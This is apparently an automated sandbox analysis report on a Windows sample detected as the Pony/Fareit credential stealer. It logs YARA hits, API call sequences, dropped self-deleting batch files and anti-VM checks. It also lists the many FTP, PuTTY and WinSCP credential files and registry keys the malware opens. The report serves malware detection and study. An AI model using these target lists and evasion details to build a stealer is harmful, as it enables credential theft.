                  Source: Yara matchFile source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_0040487E push 8E4735B3h; iretd 0_2_0040488A
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_0041CF05 pushad ; iretd 0_2_0041CF0A
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_0041DC29 push edx; iretd 0_2_0041DC33
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_0041C92D pushad ; iretd 0_2_0041C93A
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_00403EBB push 8E4735B3h; iretd 0_2_00403ECD
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_0040487E push 8E4735B3h; iretd 10_2_0040488A
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_0041CF05 pushad ; iretd 10_2_0041CF0A
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_0041DC29 push edx; iretd 10_2_0041DC33
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_0041C92D pushad ; iretd 10_2_0041C93A
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_00403EBB push 8E4735B3h; iretd 10_2_00403ECD
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004106D5 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcatA,CreateFileA,lstrcpyA,StrRChrIA,lstrcpyA,CreateFileA,lstrlenA,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,1_2_004106D5
                  Source: Adnexal8.exe.0.drStatic PE information: real checksum: 0x2b004 should be: 0x2b00e
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.22855725445
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile created: C:\Users\user\AppData\Roaming\Adnexal8.exe

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source codeShow sources
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile dump: 12537875.bat.1.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile dump: 12556453.bat.12.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004043DD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004043DD
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404C68
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040890D
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_00404FD8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00403F86
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00409484
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408789
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_1_00404C68
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_0040890D
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_1_00404FD8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_00403F86
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_1_00409484
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_1_00408789
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_00404C68
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0040890D
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_00404FD8
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_00403F86
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_00409484
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_2_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_00408789
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_1_00404C68
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_0040890D
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_1_00404FD8
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00403F86 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_00403F86
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00409484 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_1_00409484
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 12_1_00408789 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_1_00408789
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                  Source: wscript.exe, 00000009.00000003.679883383.000001FD952EA000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9N
                  Source: wscript.exe, 00000009.00000003.679883383.000001FD952EA000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
                  Source: Adnexal8.exe, 0000000C.00000002.696538454.00000000006AA000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000002.657163362.0000000000688000.00000004.00000020.sdmpBinary or memory string: 100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Adnexal8.exe, 0000000C.00000002.696538454.00000000006AA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004106D5 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcatA,CreateFileA,lstrcpyA,StrRChrIA,lstrcpyA,CreateFileA,lstrlenA,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,1_2_004106D5
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B41197 mov eax, dword ptr fs:[00000030h]0_2_04B41197
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B41491 mov eax, dword ptr fs:[00000030h]0_2_04B41491
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B41280 mov eax, dword ptr fs:[00000030h]0_2_04B41280
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B400D8 mov ebx, dword ptr fs:[00000030h]0_2_04B400D8
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B404CA mov eax, dword ptr fs:[00000030h]0_2_04B404CA
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 0_2_04B4110B mov eax, dword ptr fs:[00000030h]0_2_04B4110B
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B21491 mov eax, dword ptr fs:[00000030h]10_2_04B21491
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B21197 mov eax, dword ptr fs:[00000030h]10_2_04B21197
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B21280 mov eax, dword ptr fs:[00000030h]10_2_04B21280
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B200D8 mov ebx, dword ptr fs:[00000030h]10_2_04B200D8
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B204CA mov eax, dword ptr fs:[00000030h]10_2_04B204CA
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: 10_2_04B2110B mov eax, dword ptr fs:[00000030h]10_2_04B2110B
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, explorer.exe1_1_00402C05
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: StrStrIA,OpenProcess,RegOpenCurrentUser,Process32Next,CloseHandle, explorer.exe1_1_00402D57
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: CreateToolhelp32Snapshot,Process32First,StrStrIA,OpenProcess,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle, explorer.exe12_1_00402C05
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: StrStrIA,OpenProcess,RegOpenCurrentUser,Process32Next,CloseHandle, explorer.exe12_1_00402D57
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_0041098D lstrcmpiA,LogonUserA,lstrlenA,LCMapStringA,LogonUserA,LogonUserA,LoadUserProfileA,ImpersonateLoggedOnUser,RevertToSelf,UnloadUserProfile,CloseHandle,1_2_0041098D
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeProcess created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' 'Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeProcess created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe' Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' 'Jump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004042B2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_004042B2
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004043DD
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_1_004043DD
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,12_2_004043DD
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,12_1_004043DD
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_004043DD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004043DD
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeCode function: 1_2_00410B60 OleInitialize,GetUserNameA,1_2_00410B60

                  Stealing of Sensitive Information:

                  Yara detected Generic Dropper
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Yara detected Fareit stealer
                  Source: Yara matchFile source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR
                  Yara detected Pony
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
